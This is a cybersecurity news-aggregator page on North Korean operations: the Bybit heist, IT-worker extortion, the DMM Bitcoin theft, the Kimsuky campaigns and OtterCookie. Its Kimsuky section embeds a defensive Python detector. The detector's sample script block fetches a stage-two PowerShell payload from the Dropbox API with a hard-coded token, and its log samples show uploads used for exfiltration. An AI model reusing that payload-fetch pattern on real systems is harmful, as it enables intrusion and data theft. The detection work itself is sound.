CyberSecurity news

FlagThis - #northkorea

Oluwapelumi Adejumo@CryptoSlate - 10d
Cryptocurrency exchange Bybit has confirmed a record-breaking theft of approximately $1.46 billion in digital assets from one of its offline Ethereum wallets. The attack, which occurred on Friday, is believed to be the largest crypto heist on record. Bybit disclosed that a highly sophisticated attack resulted in the theft of more than Rs 11,972 crores in digital assets.

The theft targeted an Ethereum cold wallet: a transaction from the cold wallet to a warm wallet was manipulated, allowing the attacker to gain control of the funds and transfer them to an unidentified address. The incident highlights the rising trend of cryptocurrency heists, driven by the allure of profits and the difficulty of tracing such crimes.

Recommended read:
References :
  • www.techmeme.com: ZachXBT: crypto exchange Bybit has experienced $1.46B worth of "suspicious outflows"; Bybit CEO confirms hacker took control of cold ETH wallet
  • CryptoSlate: The crypto exchange ByBit has been hacked, and roughly $1.5 billion in Ethereum (ETH) has been stolen — making this one of the biggest hacks in history.
  • infosec.exchange: NEW: Crypto exchange Bybit said it was hacked and suffered a loss of around $1.4 billion (~401,346 ETH) at the time of the hack.
  • PCMag UK security: The Bybit exchange lost 400,000 in ETH, or about $1.4 billion, before the price began to slide, making it the biggest crypto-related hack in history.
  • techcrunch.com: TechCrunch reports on the Bybit hack, disclosing a loss of approximately $1.4 billion in Ethereum.
  • ciso2ciso.com: In a major cybersecurity incident, Bybit, the world’s 2nd-largest crypto exchange suffered a $1.4 billion ETH hack from a cold wallet breach.
  • ciso2ciso.com: Bybit Hack: $1.4B Stolen from World’s 2nd Largest Crypto Exchange – Source:hackread.com
  • cryptoslate.com: ByBit suffers $1.5 billion Ethereum heist in cold wallet breach
  • www.coindesk.com: Bybit experiences USD1.46B in suspicious outflows
  • BleepingComputer: Cryptocurrency exchange Bybit revealed today that an unknown attacker stole over $1.46 billion worth of cryptocurrency from one of its ETH cold wallets.
  • The Cryptonomist: 3 Best Bybit Alternatives As Top CEX Is Hacked
  • Gulf Business: ‘Worst hack in history’: Dubai crypto exchange Bybit suffers $1.5bn ether heist
  • www.bleepingcomputer.com: Hacker steals record $1.46 billion in ETH from Bybit cold wallet
  • Techmeme: Bybit Loses $1.5B in Hack but Can Cover Loss, CEO Confirms (Oliver Knight/CoinDesk)
  • Report Boom: Report on the Bybit crypto heist, detailing the incident and security recommendations.
  • thehackernews.com: Report on the Bybit hack, highlighting the scale of the theft and its implications.
  • reportboom.com: Reportboom article about Bybit's $1.46B Crypto Heist.
  • www.it-daily.net: Bybit hacked: record theft of 1.5 billion US dollars
  • Protos: News about the Bybit cryptocurrency exchange being hacked for over $1.4 billion.
  • The420.in: On Friday, cryptocurrency exchange Bybit disclosed that a highly sophisticated attack resulted in the theft of more than Rs 11,972 crores in digital assets from one of its offline Ethereum wallets—the largest crypto heist on record.
  • TechSpot: The hackers stole the crypto from Bybit's cold wallet, an offline storage system.
  • Talkback Resources: Crypto exchange Bybit was targeted in a $1.46 billion theft by the Lazarus Group, highlighting the rising trend of cryptocurrency heists driven by the allure of profits and challenges in tracing such crimes.
  • www.bleepingcomputer.com: Cryptocurrency exchange Bybit revealed today that an unknown attacker stole over $1.46 billion worth of cryptocurrency from one of its ETH cold wallets.
  • www.the420.in: Biggest Crypto Heist Ever: Bybit Loses Rs 12,000+ Crore in Sophisticated Ethereum Wallet Attack!
  • www.cnbc.com: This report discusses the Bybit hack, detailing the amount stolen and the potential impact on the crypto market.
  • www.engadget.com: This news piece reports on the massive crypto heist from Bybit, highlighting the scale of the incident and the impact on the crypto market.
  • Techmeme: Arkham says ZachXBT submitted proof that North Korea's Lazarus Group is behind Bybit's $1.5B hack, which is the largest single theft in crypto history
  • BrianKrebs: Infosec exchange post describing Bybit breach.
  • Talkback Resources: Bybit cryptocurrency exchange suffered a cyberattack resulting in the theft of $1.5 billion worth of digital currency, including over 400,000 ETH and stETH, with potential vulnerabilities in the Safe.global platform's user interface exploited.
  • securityaffairs.com: SecurityAffairs reports Lazarus APT stole $1.5B from Bybit, it is the largest cryptocurrency heist ever.
  • gulfbusiness.com: ‘Worst hack in history’: Dubai crypto exchange Bybit suffers $1.5bn ether heist
  • techcrunch.com: Crypto exchange Bybit says it was hacked and lost around $1.4B
  • Tekedia: The cryptocurrency industry has been rocked by what is now considered the largest digital asset theft in history, as Bybit, a leading crypto exchange, confirmed on Friday that hackers stole approximately $1.4 billion worth of Ethereum (ETH) from one of its offline wallets.
  • blog.checkpoint.com: What the Bybit Hack Means for Crypto Security and the Future of Multisig Protection
  • Dan Goodin: Crypto exchange Bybit said it was hacked and suffered a loss of around $1.4 billion (~401,346 ETH) at the time of the hack.
  • BleepingComputer: Crypto exchange Bybit revealed today that an unknown attacker stole over $1.46 billion worth of cryptocurrency from one of its ETH cold wallets.
  • Security Boulevard: North Korea’s Lazarus Group Hacks Bybit, Steals $1.5 Billion in Crypto
  • bsky.app: Elliptic is following the money on this ByBit hack - the biggest theft of all time. “Within 2 hours of the theft, the stolen funds were sent to 50 different wallets, each holding approximately 10,000 ETH. These are now being systematically emptied”.
  • Talkback Resources: Talkback Post about the $1.5B Bybit Hack: The Era of Operational Security Failures Has Arrived
  • infosec.exchange: Reports that North Korean hackers stole $1.4 billion in crypto from Bybit.
  • securityboulevard.com: North Korea's notorious Lazarus Group reportedly stole $1.5 billion in cryptocurrency from the Bybit exchange in what is being called the largest hack in the controversial market's history.
  • billatnapier.medium.com: One of the Largest Hacks Ever? But Will The Hackers Be Able To Launder The Gains?
  • thecyberexpress.com: Details on Bybit Cyberattack.
  • Matthew Rosenquist: This may turn out to be the biggest hack in history! $1.5 BILLION.
  • PCMag UK security: The $1.4 billion at Bybit—the largest known cryptocurrency heist in history—has been traced to the notorious Lazarus North Korean hacking group.
  • www.nbcnews.com: Hackers steal $1.5 billion from exchange Bybit in biggest-ever crypto heist: Blockchain analysis firm Elliptic later linked the attack to North Korea’s Lazarus Group, a state-sponsored hacking collective
  • www.pcmag.com: Researchers spot the $1.4 billion stolen from Bybit moving through cryptocurrency wallets that were used in earlier heists attributed to North Korea's Lazarus hacking group.
  • siliconangle.com: $1.5B in cryptocurrency stolen from Bybit in attack linked to North Korean hackers
  • www.americanbanker.com: Nearly $1.5 billion in tokens lost in Bybit crypto exchange hack
  • SiliconANGLE: SiliconAngle reports on the details of the Bybit hack and links it to North Korean hackers.
  • techcrunch.com: TechCrunch reports on the massive crypto heist, citing research that points to North Korean hackers as perpetrators.
  • OODAloop: Reports that North Korea’s Lazarus Group APT is Behind Largest Crypto Heist Ever
  • Be3: Looming Shadows: $1.5 Billion Crypto Heist Shakes Confidence in Security Measures
  • Schneier on Security: Schneier on Security covers the North Korean Hackers Stealing $1.5B in Cryptocurrency.
  • Dataconomy: How the Bybit hack shook the crypto world: $1.5B gone overnight
  • be3.sk: Looming Shadows: $1.5 Billion Crypto Heist Shakes Confidence in Security Measures
  • Risky Business: Risky Business #781 -- How Bybit oopsied $1.4bn
  • cyberriskleaders.com: Bybit, a leading exchange, was hacked for USD1.4 billion in Ethereum and staked Ethereum, sending shockwaves through the digital asset community.
  • www.csoonline.com: Independent investigation finds connections to the Lazarus Group.
  • Cybercrime Magazine: Bybit suffers the largest crypto hack in history
  • www.theguardian.com: Cyberattackers believed to be affiliated with the state-sponsored threat group pulled off the largest crypto heist reported to date, stealing $1.5 billion from exchange Bybit.
  • bsky.app: Forensic investigators have discovered that North Korean Lazarus hackers stole $1.5 billion from Bybit after first breaching a Safe{Wallet} developer machine. The multisig wallet platform has also confirmed these findings in a statement issued today.
  • Sergiu Gatlan: Forensic investigators have discovered that North Korean Lazarus hackers stole $1.5 billion from Bybit after first breaching a Safe{Wallet} developer machine. The multisig wallet platform has also confirmed these findings in a statement issued today.
  • SecureWorld News: SecureWorld reports on the Bybit hack, attributing it to the Lazarus Group.
  • OODAloop: The Largest Theft in History – Following the Money Trail from the Bybit Hack
  • gbhackers.com: Researchers Uncover $1.4B in Sensitive Data Tied to ByBit Hack by Lazarus Group
  • Secure Bulletin: The Lazarus Group, a notorious North Korean state-sponsored hacking collective, has once again demonstrated its sophistication and audacity with a staggering $1.5 billion cryptocurrency heist targeting Bybit, a major crypto exchange.
  • Talkback Resources: THN Weekly Recap: From $1.5B Crypto Heist to AI Misuse & Apple’s Data Dilemma [mal]
  • infosec.exchange: NEW: Hacked crypto exchange Bybit is offering $140 million in bounties to anyone who can help locate and freeze the stolen ethereum.
  • CyberInsider: Record $1.5 billion Bybit hack undermines trust in crypto security
  • The Register - Security: Cryptocurrency exchange Bybit, just days after suspected North Korean operatives stole $1.5 billion in Ethereum from it, has launched a bounty program to help recover its funds.
  • PCMag UK security: The malicious JavaScript code used in the attack could secretly modify transactions for Safe{Wallet}, a cryptocurrency wallet provider. The suspected North Korean hackers who stole $1.4 billion in cryptocurrency from Bybit pulled off the heist by infiltrating a digital wallet provider and tampering with its software.
  • techcrunch.com: Last week, hackers stole around $1.4 billion in Ethereum cryptocurrency from crypto exchange Bybit, believed to be the largest crypto heist in history. Now the company is offering a total of $140 million in bounties for anyone who can help trace and freeze the stolen funds. Bybit’s CEO and
  • securityaffairs.com: The FBI confirmed that North Korea is responsible for the record-breaking cyber heist at the crypto exchange Bybit.
  • The Register - Security: The FBI has officially accused North Korea's Lazarus Group of stealing $1.5 billion in Ethereum from crypto-exchange Bybit earlier this month, and asked for help tracking down the stolen funds.
  • techcrunch.com: The FBI said the North Korean government is ‘responsible’ for the hack at crypto exchange Bybit, which resulted in the theft of more than $1.4 billion in Ethereum cryptocurrency.
  • Talkback Resources: FBI Says North Korea Hacked Bybit as Details of $1.5B Heist Emerge [net] [mal]
  • PCMag UK security: FBI Blames North Korea for Massive $1.4 Billion Cryptocurrency Heist
  • The420.in: Rs 1.27 trillion Stolen: Bybit Joins the Ranks of Crypto’s Largest Thefts – Full List Inside
  • Talkback Resources: Bybit Hack Traced to Safe{Wallet} Supply Chain Attack Exploited by North Korean Hackers [mal]
  • Tekedia: Bybit Declares War on “Notorious” Lazarus Group After $1.4B Hack, Offers $140m Reward
  • SecureWorld News: The FBI officially attributed the massive heist to North Korea's state-sponsored hacking group, TraderTraitor, more commonly known as the infamous Lazarus Group.
  • ChinaTechNews.com: North Korea was behind the theft of approximately $1.5bn in virtual assets from a cryptocurrency exchange, the FBI has said, in what is being described as the biggest heist in history.
  • Wallarm: Lab Wallarm discusses how Bybit’s Real-Time Blacklisting Is Thwarting a $1.5B Crypto Heist
  • iHLS: Cryptocurrency exchange Bybit became the latest victim of a major cyberattack, marking what appears to be the largest crypto hack in history.
  • thehackernews.com: Bybit Hack Traced to Safe{Wallet} Supply Chain Attack Exploited by North Korean Hackers
  • www.pcmag.com: FBI Blames North Korea for Massive $1.4 Billion Cryptocurrency Heist
  • Dan Goodin: InfoSec Exchange Post on the FBI attribution to the Lazarus group and Bybit hack

@ofac.treasury.gov - 38d
North Korean IT workers are increasingly engaging in aggressive extortion tactics against companies that unknowingly hired them. The FBI and Mandiant have issued warnings about these workers, who exploit remote access to steal sensitive data and demand ransom payments. After being discovered, some of these workers hold stolen data and proprietary code hostage, threatening to publicly release it if demands are not met. There have also been reports of workers attempting to steal code repositories, company credentials, and session cookies for further compromise.

This escalation in tactics is attributed to increased law enforcement action, sanctions, and media coverage, which have reduced the success of their schemes. The US Department of Justice has indicted several individuals, including North Korean nationals, for their involvement in elaborate "laptop farm" schemes. These schemes use stolen identities, forged documents, and remote access software to deceive companies into hiring North Korean IT workers and generate revenue for the DPRK regime. The indicted individuals are accused of generating over $800,000, which was then laundered, highlighting the sophistication and reach of this cybercrime operation.

Recommended read:
References :
  • ciso2ciso.com: North Korean Fake IT Workers More Aggressively Extorting Enterprises
  • Cyber Security News: North Korean IT Workers Demands Ransomware By Stealing Companies Source Codes
  • securityonline.info: North Korean IT Workers Indicted in Elaborate “Laptop Farm” Scheme to Evade Sanctions
  • www.justice.gov: This highlights the evolving cybercrime tactics of North Korea
  • cybersecuritynews.com: North Korean IT Workers Demands Ransomware By Stealing Companies Source Codes
  • www.bleepingcomputer.com: The FBI warns that North Korean IT workers are abusing their access to steal source code and extort US companies that have been tricked into hiring them.
  • Techmeme: The FBI warns that North Korean IT workers are abusing their access to steal source code and extort US companies that have been tricked into hiring them (Sergiu Gatlan/BleepingComputer)
  • oodaloop.com: DoJ nabs five suspects in North Korean remote worker scheme
  • www.computerworld.com: DOJ indicts North Korean conspirators for remote IT work scheme
  • CSO Online: DOJ indicts North Korean conspirators for remote IT work scheme
  • The420.in: FBI Warns: North Korean Hackers Stealing Source Code to Extort Employers
  • ciso2ciso.com: DOJ indicts North Korean conspirators for remote IT work scheme
  • www.the420.in: FBI Warns: North Korean Hackers Stealing Source Code to Extort Employers
  • DOJ indicts North Korean conspirators for remote IT work scheme – Source: www.computerworld.com
  • ciso2ciso.com: US Charges Five People Over North Korean IT Worker Scheme – Source: www.securityweek.com
  • www.helpnetsecurity.com: North Korean IT workers are extorting employers, FBI warns
  • The Register: North Korean dev who renamed himself 'Bane' accused of IT worker fraud scheme
  • The Register - Security: North Korean dev who renamed himself 'Bane' accused of IT worker fraud scheme
  • ciso2ciso.com: North Korean dev who renamed himself ‘Bane’ accused of IT worker fraud scheme – Source: go.theregister.com
  • Help Net Security: North Korean IT workers are extorting employers, FBI warns

info@thehackernews.com (The Hacker News)@The Hacker News - 69d
The North Korean hacking group known as TraderTraitor, also identified as Jade Sleet, UNC4899, and Slow Pisces, has been linked to the theft of $308 million in cryptocurrency from the Japanese exchange DMM Bitcoin in May. This group, a cryptocurrency-focused element within North Korea's Reconnaissance General Bureau, primarily targets blockchain-related companies. Authorities, including the FBI, the Department of Defense Cyber Crime Center, and the National Police Agency of Japan, confirmed the group's involvement, highlighting TraderTraitor's use of targeted social engineering to infiltrate its victims. The group's known methods also include supply chain attacks and malware deployment.

The FBI outlined the attack chain, which began in March when TraderTraitor members posed as recruiters and contacted an employee at a cryptocurrency wallet software company named Ginco. This led to the deployment of a malicious Python script. By exploiting the compromised employee's access, the hackers manipulated a legitimate DMM transaction request, resulting in the theft of 4,502.9 Bitcoin, valued at $308 million at the time. The stolen funds were then moved to TraderTraitor-controlled wallets. Following the hack, DMM Bitcoin restricted its services until investigations were complete.

Recommended read:
References :
  • The Hacker News: The Hacker News reports on North Korean hackers stealing $308M in Bitcoin from DMM Bitcoin.
  • www.bleepingcomputer.com: The North Korean hacker group 'TraderTraitor' stole $308 million worth of cryptocurrency in the attack on the Japanese exchange DMM Bitcoin in May.
  • www.coindesk.com: US and Japanese law enforcement say North Korean hackers were responsible for stealing 4,502.9 bitcoin, worth $308M, from Japanese exchange DMM in May 2024 (Sheldon Reback/CoinDesk)
  • BleepingComputer: The North Korean hacker group 'TraderTraitor' stole $308 million worth of cryptocurrency in the attack on the Japanese exchange DMM Bitcoin in May.
  • FBI: This is not much of a cybersecurity advisory: The Federal Bureau of Investigation, Department of Defense Cyber Crime Center (DC3), and National Police Agency of Japan linked the theft of cryptocurrency worth $308 million U.S. dollars from the Japan-based cryptocurrency company DMM to North Korea's . They also confirmed different private industry threat actor names: , , and . TraderTraitor is a cryptocurrency-focused element within the Reconnaissance General Bureau (RGB), that primarily targets blockchain-related companies (and related vendors).
  • COINOTAG NEWS: Coinotag reports about the 48.2 Billion Yen Bitcoin theft linked to North Korea.
  • ciso2ciso.com: US and Japan Blame North Korea for $308m Crypto Heist
  • www.techmeme.com: US and Japanese law enforcement say North Korean hackers were responsible for stealing 4,502.9 bitcoin, worth $308M, from Japanese exchange DMM in May 2024 (Sheldon Reback/CoinDesk)
  • securityonline.info: North Korean Cyber Actors TraderTraitor Steal $308 Million in Cryptocurrency: DMM Breach Unveiled
  • Techmeme: US and Japanese law enforcement say North Korean hackers were responsible for stealing 4,502.9 bitcoin, worth $308M, from Japanese exchange DMM in May 2024 (Sheldon Reback/CoinDesk)
  • ciso2ciso.com: FBI Blames North Korea for $308M Cryptocurrency Hack as Losses Surge in 2024
  • securityaffairs.com: DMM Bitcoin $308M Bitcoin heist linked to North Korea
  • osint10x.com: North Korean Hackers Pull Off $308M Bitcoin Heist from Crypto Firm DMM Bitcoin
  • ciso2ciso.com: DMM Bitcoin $308M Bitcoin heist linked to North Korea – Source: securityaffairs.com
  • www.scworld.com: Suspected Lazarus subgroup behind DMM crypto heist
  • Cybernews: A gang of North Korean-affiliated threat actors stole $308 million worth of cryptocurrency from a Japanese crypto company.
  • Bitcoin News: FBI Links North Korean Hackers to $308 Million DMM Exchange Breach
  • therecord.media: The FBI blamed the theft of $300 million from Japanese crypto platform DMM on hackers from North Korea

Guru Baran@Cyber Security News - 42d
A North Korean IT worker who adopted the alias 'Bane' is at the center of a fraudulent scheme that targeted numerous US companies. This individual, along with others, is accused of infiltrating these companies to steal confidential source code and then demanding ransom payments to prevent the release of the stolen data. This is not an isolated incident: the operation appears to have run from 2018 until around August 2024, with other North Korean nationals involved.

Five individuals have been indicted in connection with this cyber operation. The individuals are accused of creating fake US worker visa documents and setting up staffing companies to secure employment for remote contractors, specifically North Korean IT workers, in positions such as mobile app developers and specialist engineers. These individuals also established US bank accounts and used other payment platforms to launder the money. The scheme successfully deceived at least 64 US companies, with payments made by just ten of these organizations totaling approximately $866,255.

Recommended read:
References :
  • ciso2ciso.com: The U.S. has sanctioned North Korean IT worker network supporting WMD programs.
  • The sanctions target organizations and individuals believed to be generating illicit revenue for the North Korean government.
  • malware.news: The U.S. has continued its crackdown against North Korean IT worker scams with sanctions against the country's government weapons trading office Department 53 and its Laos-based front companies Korea Osong Shipping and Chonsurim Trading Corporation.
  • The Hacker News: The U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) has imposed sanctions against a Chinese cybersecurity company and a Shanghai-based cyber actor for their alleged links to the Salt Typhoon group and the recent compromise of the federal agency.
  • ciso2ciso.com: North Korean dev who renamed himself ‘Bane’ accused of IT worker fraud scheme – Source: go.theregister.com
  • Cyber Security News: Reporting on the alleged scheme and its impact on businesses.
  • The Register: The article details how North Korean individuals pose as IT workers, gaining access to sensitive information and demanding extortion.
  • North Korean dev who renamed himself ‘Bane’ accused of IT worker fraud scheme
  • go.theregister.com: North Korean developers are engaged in a long-running fraudulent scheme involving remote IT workers.
  • www.justice.gov: Indictments issued in connection with the fraudulent remote IT worker scheme. The scheme includes North Korean nationals. The targets include American businesses.
  • cybersecuritynews.com: North Korean IT workers masquerading as remote workers have been breaking into Western companies, stealing confidential source codes, and requesting ransoms to prevent their release.
  • oodaloop.com: The Department of Justice has arrested several individuals who were involved with a North Korean program to trick companies into hiring North Koreans for remote positions.
  • www.bleepingcomputer.com: The FBI warned today that North Korean IT workers are abusing their access to steal source code and extort U.S. companies that have been tricked into hiring them.
  • www.computerworld.com: The US Department of Justice this week announced that it had indicted two North Korean nationals and three other men, accusing them of participating in a conspiracy designed to trick US companies into funding the North Korean regime.
  • ciso2ciso.com: North Korean Fake IT Workers More Aggressively Extorting Enterprises
  • Techmeme: The FBI warns that North Korean IT workers are abusing their access to steal source code and extort US companies that have been tricked into hiring them (Sergiu Gatlan/BleepingComputer)
  • www.techmeme.com: The FBI warned today that North Korean IT workers are abusing their access to steal source code and extort U.S. companies that have been tricked into hiring them.
  • CSO Online: One recent case saw a bad actor use deepfake video technology and automated voice translation in a video interview, though this didn’t work particularly well and the interviewers were easily able to tell that something was wrong.
  • ciso2ciso.com: US Charges Five People Over North Korean IT Worker Scheme – Source: www.securityweek.com
  • DOJ indicts North Korean conspirators for remote IT work scheme
  • ciso2ciso.com: News article about North Korean hackers.
  • Help Net Security: The FBI is on a mission to raise awareness about the threat that North Korean IT workers present to organizations in the US and around the world.
  • The FBI warned about North Korean IT workers increasingly exploiting remote access to steal sensitive data and extort companies.
  • The Hacker News: The indictment targets individuals including two North Korean nationals, a Mexican national, and two U.S. nationals.
  • BleepingComputer: The FBI warned today that North Korean IT workers are abusing their access to steal source code and extort U.S. companies that have been tricked into hiring them.

@gbhackers.com - 19d
North Korean hackers, specifically the Kimsuky APT group (also known as Emerald Sleet), have been observed employing a new tactic to compromise targets. The group is tricking individuals into running PowerShell as an administrator, then instructing them to paste and execute malicious code they provide. The threat actor masquerades as a South Korean government official, building rapport before sending a spear-phishing email with a PDF attachment containing instructions to open PowerShell as an administrator and paste a specific code snippet.

If the target executes the code, it downloads and installs a browser-based remote desktop tool along with a certificate and PIN. The code then sends a web request to register the victim device, granting the threat actor access for data exfiltration. Microsoft Threat Intelligence has observed this tactic in limited attacks since January 2025, describing it as a departure from the threat actor's usual tradecraft.

Recommended read:
References :
  • gbhackers.com: Microsoft Threat Intelligence has exposed a novel cyberattack method employed by the North Korean state-sponsored hacking group, Emerald Sleet (also known as Kimsuky or VELVET CHOLLIMA).
  • securityaffairs.com: North Korea-linked APT Emerald Sleet is using a new tactic
  • The Hacker News: The North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that involves deceiving targets.
  • BleepingComputer: North Korean state actor 'Kimsuky' (aka 'Emerald Sleet' or 'Velvet Chollima') has been observed using a new tactic inspired by the now widespread ClickFix campaigns.
  • Microsoft Threat Intelligence has observed North Korean state actor Emerald Sleet (also known as Kimsuky and VELVET CHOLLIMA) using a new tactic: tricking targets into running PowerShell as an administrator and then pasting and running code provided by the threat actor.
  • www.bleepingcomputer.com: Reports on Emerald Sleet's activity exploiting PowerShell.
  • www.microsoft.com: The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation
  • www.scworld.com: PowerShell exploited in new Kimsuky intrusions
  • Talkback Resources: Kimsuky, a North Korean nation-state threat actor, is conducting an ongoing cyber attack campaign named DEEP#DRIVE targeting South Korean business, government, and cryptocurrency sectors using tailored phishing lures and leveraging PowerShell scripts and Dropbox for payload delivery and data exfiltration.
  • The Hacker News: North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks
  • MSSP feed for Latest: Ongoing Kimsuky Attack Campaign Exploits PowerShell, Dropbox
  • securityaffairs.com: Analyzing DEEP#DRIVE: North Korean

info@thehackernews.com (The Hacker News)@The Hacker News - 66d
North Korean threat actors are actively using a new malware called ‘OtterCookie’ in their ‘Contagious Interview’ campaign. This campaign is targeting software developers with fake job offers. The malware acts as a backdoor, enabling unauthorized access to compromised systems. This is part of a broader trend of North Korean cyber activity aimed at financial gain and espionage. The activity indicates a sophisticated and persistent threat actor leveraging social engineering to infiltrate targeted systems.

Recommended read:
References :
  • Cyber Security News: New ‘OtterCookie’ Malware Targets Developers with Fake Job Offers
  • securityonline.info: “OtterCookie” Malware Nibbles at Developers in “Contagious Interview” Campaign
  • The Hacker News: North Korean Hackers Deploy OtterCookie Malware in Contagious Interview Campaign
  • www.scworld.com: Novel OtterCookie malware added to Contagious Interview attack arsenal
  • gbhackers.com: New ‘OtterCookie’ Malware Attacking Software Developers Via Fake Job Offers
  • ciso2ciso.com: North Korean Hackers Deploy OtterCookie Malware in Contagious Interview Campaign – Source:thehackernews.com
  • securityaffairs.com: North Korea actors use OtterCookie malware in Contagious Interview campaign
  • North Korea actors use OtterCookie malware in Contagious Interview campaign - Source: securityaffairs.com
  • ciso2ciso.com: North Korea actors use OtterCookie malware in Contagious Interview campaign – Source: securityaffairs.com
  • www.bleepingcomputer.com: New 'OtterCookie' malware used to backdoor devs in fake job offers
  • Hacker News: New 'OtterCookie' malware used to backdoor devs in fake job offers

@Talkback Resources - 17d
Kimsuky, a North Korean advanced persistent threat operation also known as APT43, is actively targeting South Korean entities within the business, government, and cryptocurrency sectors. The hacking group employs a sophisticated attack campaign, named DEEP#DRIVE, that starts with spear-phishing emails designed to establish trust by spoofing a South Korean government official. These emails contain malicious PDF documents and links redirecting victims to websites hosting PowerShell code, ultimately leading to code execution on the targeted systems.

This campaign uses tailored phishing lures written in Korean and disguised as legitimate documents, such as work logs, insurance documents, and crypto-related files. The attack chain relies heavily on PowerShell scripts for payload delivery, reconnaissance, and execution. Dropbox is used both to distribute payloads and to exfiltrate data, with the scripts authenticating to the Dropbox API using OAuth tokens. Because the traffic goes to a legitimate, widely used cloud service over HTTPS, IP- or domain-based blocklists do not stop it and it blends in with normal Dropbox use, which makes the activity hard to detect.
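As an added illustration of the detection angle (this is editor-written example code, not tooling from the DEEP#DRIVE research or from any of the sources below), the Python script flags the two observables the description leaves a defender: a scripting host such as powershell.exe talking to the Dropbox API, and a PowerShell script block that carries a hard-coded OAuth bearer token next to a Dropbox API call. The proxy log layout, workstation names, sample lines and token value are all constructed for the example; only the Dropbox API hostnames are real.

```python
"""Flag PowerShell-originated Dropbox API traffic and hard-coded OAuth tokens.

Added example. The proxy log layout, hostnames and the script-block fragment
below are constructed for illustration; only the Dropbox API hostnames are real.
"""
import re
from dataclasses import dataclass

# Real Dropbox API endpoints. Traffic to them is normal for the Dropbox
# desktop client; the signal here is a scripting host using them instead.
DROPBOX_API_HOSTS = {"api.dropboxapi.com", "content.dropboxapi.com"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# Constructed proxy log: ts host process method dest path user-agent (UA may contain spaces)
SAMPLE_PROXY_LOG = """\
2025-02-10T09:12:01Z ws-17 powershell.exe POST content.dropboxapi.com /2/files/upload Mozilla/5.0 (Windows NT 10.0) WindowsPowerShell/5.1.19041.4522
2025-02-10T09:12:05Z ws-17 Dropbox.exe POST content.dropboxapi.com /2/files/upload Dropbox-Desktop-Client
2025-02-10T09:13:44Z ws-22 powershell.exe GET www.microsoft.com /en-us/ Mozilla/5.0 WindowsPowerShell/5.1
2025-02-10T09:15:02Z ws-17 powershell.exe POST content.dropboxapi.com /2/files/download Mozilla/5.0 WindowsPowerShell/5.1
"""

# Constructed PowerShell fragment of the kind script-block logging (Event ID 4104)
# records. The token is a fake placeholder, not a real Dropbox credential.
SAMPLE_SCRIPT_BLOCK = r'''
$h = @{ "Authorization" = "Bearer FAKETOKEN.abcdefghijklmnopqrstuvwxyz0123"; "Dropbox-API-Arg" = '{"path":"/stage2.ps1"}' }
$body = Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/download" -Method Post -Headers $h
'''


@dataclass(frozen=True)
class ProxyEvent:
    ts: str
    host: str
    process: str
    method: str
    dest: str
    path: str
    user_agent: str


def parse_proxy_log(text):
    """Parse the constructed 7-field format; malformed lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        parts = line.strip().split(None, 6)
        if len(parts) == 7:
            events.append(ProxyEvent(*parts))
    return events


def classify_path(path):
    """Map a Dropbox API path onto the role it plays in the attack chain."""
    if path.startswith("/2/files/upload"):
        return "exfiltration"
    if path.startswith("/2/files/download"):
        return "payload_fetch"
    return "other"


def flag_script_to_dropbox(events):
    """Return (event, role) pairs where a scripting host talks to the Dropbox API."""
    return [(e, classify_path(e.path)) for e in events
            if e.process.lower() in SCRIPT_HOSTS and e.dest.lower() in DROPBOX_API_HOSTS]


# An OAuth bearer token assigned in a header table, and a web cmdlet whose
# command line mentions a Dropbox API host.
BEARER_RE = re.compile(
    r"""Authorization["']?\s*[=:]\s*["']?Bearer\s+([A-Za-z0-9._\-]{16,})""", re.I)
DROPBOX_CALL_RE = re.compile(
    r"(Invoke-RestMethod|Invoke-WebRequest|Net\.WebClient)[^\n]*dropboxapi\.com", re.I)


def flag_script_block(text):
    """Return findings from one script block as (kind, detail) tuples."""
    findings = []
    for m in BEARER_RE.finditer(text):
        # Keep only a prefix so the alert itself does not leak the credential.
        findings.append(("hardcoded_bearer_token", m.group(1)[:6] + "..."))
    for m in DROPBOX_CALL_RE.finditer(text):
        findings.append(("dropbox_api_call", m.group(1)))
    return findings


if __name__ == "__main__":
    for event, role in flag_script_to_dropbox(parse_proxy_log(SAMPLE_PROXY_LOG)):
        print(f"{event.ts} {event.host} {event.process} -> {event.dest}{event.path} [{role}]")
    for kind, detail in flag_script_block(SAMPLE_SCRIPT_BLOCK):
        print(f"script-block: {kind} {detail}")
```

The point of keying on the process rather than the destination is that blocking dropboxapi.com outright is rarely an option, whereas a scripting host uploading to it is unusual enough to alert on. The Dropbox.exe line in the sample is deliberately not flagged. Note that a hard-coded bearer token in a script block is also the lever an incident responder has: with a lawful-process request to the provider, that token identifies the attacker's account.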

Recommended read:
References :

SC Staff@scmagazine.com - 46d
North Korean state-sponsored hackers have been identified as the perpetrators behind cryptocurrency heists totaling over $659 million in 2024. A joint statement from the United States, Japan, and South Korea warns the blockchain industry about these escalating cyber threats, which target not only exchanges and custodians but also individuals. The attacks have used increasingly sophisticated methods, including fake job postings to infiltrate companies, allowing threat actors to deploy malware and conduct social engineering attacks, with the Lazarus Group being identified as a key player in these operations.

The cyberattacks resulted in major losses for various cryptocurrency exchanges and platforms, including $308 million from DMM Bitcoin, $50 million each from Upbit and Radiant Capital, and $16.13 million from Rain Management. Additionally, the joint statement confirmed North Korea was responsible for a $235 million attack on WazirX, an Indian cryptocurrency exchange, in July 2024. These operations are believed to be aimed at funding North Korea's weapons programs, highlighting the international financial impact of the nation's cyber activities.

Recommended read:
References :
  • techcrunch.com: North Korea stole over $659M in crypto heists during 2024, deployed fake job seekers
  • www.scworld.com: North Korean crypto heist toll exceeded $659M in 2024
  • cryptobriefing.com: US, Japan, and South Korea warn blockchain industry of North Korea’s ongoing cyber threats
  • The Verge: North Korea linked to crypto heists of over $650 million in 2024 alone
  • SecurityScorecard: North Korean state-sponsored APT Lazarus (Group) is targeting software developers looking for freelance Web3 and cryptocurrency work in what SecurityScorecard calls Operation 99.

Help Net Security@Help Net Security - 31d
Researchers have uncovered that the Lazarus Group, a North Korean state-sponsored hacking group, is using a web-based administrative panel built with React and Node.js to manage their global cyber operations. This platform gives them a centralized control point for overseeing compromised systems, organizing stolen data, and delivering malicious payloads. The administrative layer, dubbed "Phantom Circuit," is consistent across the group's command-and-control servers, allowing them to orchestrate campaigns with precise control, even while varying their payloads and obfuscation techniques.

